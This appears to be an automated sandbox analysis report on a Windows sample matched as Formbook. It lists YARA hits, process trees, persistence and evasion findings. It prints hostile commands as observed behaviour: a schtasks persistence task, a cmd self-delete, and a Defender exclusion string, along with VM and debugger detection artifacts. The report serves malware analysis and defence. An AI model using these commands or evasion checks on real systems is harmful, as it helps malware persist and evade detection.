Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: YNzE2QUkvaTK7kd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VVhTSSmjNa.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@3/3
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_01
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Mutant created: \Sessions\1\BaseNamedObjects\iUKpdefZfVWfUzOCQt
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Local\Temp\tmp27F.tmp
Source: YNzE2QUkvaTK7kd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: YNzE2QUkvaTK7kd.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File read: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe
Source: unknown Process created: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe 'C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe'
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: YNzE2QUkvaTK7kd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YNzE2QUkvaTK7kd.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 00000006.00000002.701409870.00000000017B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.701470628.00000000017C0000.00000040.00000001.sdmp, ipconfig.exe, 00000009.00000002.912250730.00000000033C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, ipconfig.exe
Source: Binary string: RegSvcs.pdb source: ipconfig.exe, 00000009.00000002.911484763.00000000009A0000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.922844395.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_018404D0 push C033017Eh; ret 0_2_018404E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00417C05 push cs; iretd 6_2_00417C22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040AE9D push edi; ret 6_2_0040AE9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040B7E3 push es; ret 6_2_0040B7EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0183D0D1 push ecx; ret 6_2_0183D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0343D0D1 push ecx; ret 9_2_0343D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CEB5 push eax; ret 9_2_02E1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E0AE9D push edi; ret 9_2_02E0AE9F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E0B7E3 push es; ret 9_2_02E0B7EA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF6C push eax; ret 9_2_02E1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF02 push eax; ret 9_2_02E1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CF0B push eax; ret 9_2_02E1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E17C05 push cs; iretd 9_2_02E17C22
Source: initial sample Static PE information: section name: .text entropy: 7.95067945921

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File created: C:\Users\user\AppData\Roaming\VVhTSSmjNa.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEA
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: YNzE2QUkvaTK7kd.exe PID: 6860, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002E098E4 second address: 0000000002E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002E09B5E second address: 0000000002E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe TID: 6864 Thread sleep time: -101616s >= -30000s
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe TID: 6892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7036 Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 7036 Thread sleep time: -68000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1744 Thread sleep time: -65000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 101616
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.684736285.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: vmware
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.680533205.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.678461920.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.685038771.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.685138385.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666154423.0000000003203000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.679890424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C182 mov eax, dword ptr fs:[00000030h] 6_2_0180C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A185 mov eax, dword ptr fs:[00000030h] 6_2_0181A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB171 mov eax, dword ptr fs:[00000030h] 6_2_017EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812990 mov eax, dword ptr fs:[00000030h] 6_2_01812990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EC962 mov eax, dword ptr fs:[00000030h] 6_2_017EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018669A6 mov eax, dword ptr fs:[00000030h] 6_2_018669A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018161A0 mov eax, dword ptr fs:[00000030h] 6_2_018161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A49A4 mov eax, dword ptr fs:[00000030h] 6_2_018A49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018651BE mov eax, dword ptr fs:[00000030h] 6_2_018651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov ecx, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF mov eax, dword ptr fs:[00000030h] 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018741E8 mov eax, dword ptr fs:[00000030h] 6_2_018741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9100 mov eax, dword ptr fs:[00000030h] 6_2_017E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EB1E1 mov eax, dword ptr fs:[00000030h] 6_2_017EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov eax, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 mov ecx, dword ptr fs:[00000030h] 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181513A mov eax, dword ptr fs:[00000030h] 6_2_0181513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B944 mov eax, dword ptr fs:[00000030h] 6_2_0180B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01863884 mov eax, dword ptr fs:[00000030h] 6_2_01863884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 mov eax, dword ptr fs:[00000030h] 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018290AF mov eax, dword ptr fs:[00000030h] 6_2_018290AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0181F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181F0BF mov eax, dword ptr fs:[00000030h] 6_2_0181F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB02A mov eax, dword ptr fs:[00000030h] 6_2_017FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0187B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0180B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01867016 mov eax, dword ptr fs:[00000030h] 6_2_01867016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E58EC mov eax, dword ptr fs:[00000030h] 6_2_017E58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B4015 mov eax, dword ptr fs:[00000030h] 6_2_018B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E40E1 mov eax, dword ptr fs:[00000030h] 6_2_017E40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181002D mov eax, dword ptr fs:[00000030h] 6_2_0181002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 mov eax, dword ptr fs:[00000030h] 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01800050 mov eax, dword ptr fs:[00000030h] 6_2_01800050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2073 mov eax, dword ptr fs:[00000030h] 6_2_018A2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9080 mov eax, dword ptr fs:[00000030h] 6_2_017E9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B1074 mov eax, dword ptr fs:[00000030h] 6_2_018B1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A138A mov eax, dword ptr fs:[00000030h] 6_2_018A138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189D380 mov ecx, dword ptr fs:[00000030h] 6_2_0189D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181B390 mov eax, dword ptr fs:[00000030h] 6_2_0181B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812397 mov eax, dword ptr fs:[00000030h] 6_2_01812397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EDB60 mov ecx, dword ptr fs:[00000030h] 6_2_017EDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EF358 mov eax, dword ptr fs:[00000030h] 6_2_017EF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814BAD mov eax, dword ptr fs:[00000030h] 6_2_01814BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B5BA5 mov eax, dword ptr fs:[00000030h] 6_2_018B5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EDB40 mov eax, dword ptr fs:[00000030h] 6_2_017EDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018653CA mov eax, dword ptr fs:[00000030h] 6_2_018653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018103E2 mov eax, dword ptr fs:[00000030h] 6_2_018103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0180DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 mov ecx, dword ptr fs:[00000030h] 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 mov eax, dword ptr fs:[00000030h] 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 mov eax, dword ptr fs:[00000030h] 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A131B mov eax, dword ptr fs:[00000030h] 6_2_018A131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8B58 mov eax, dword ptr fs:[00000030h] 6_2_018B8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F1B8F mov eax, dword ptr fs:[00000030h] 6_2_017F1B8F
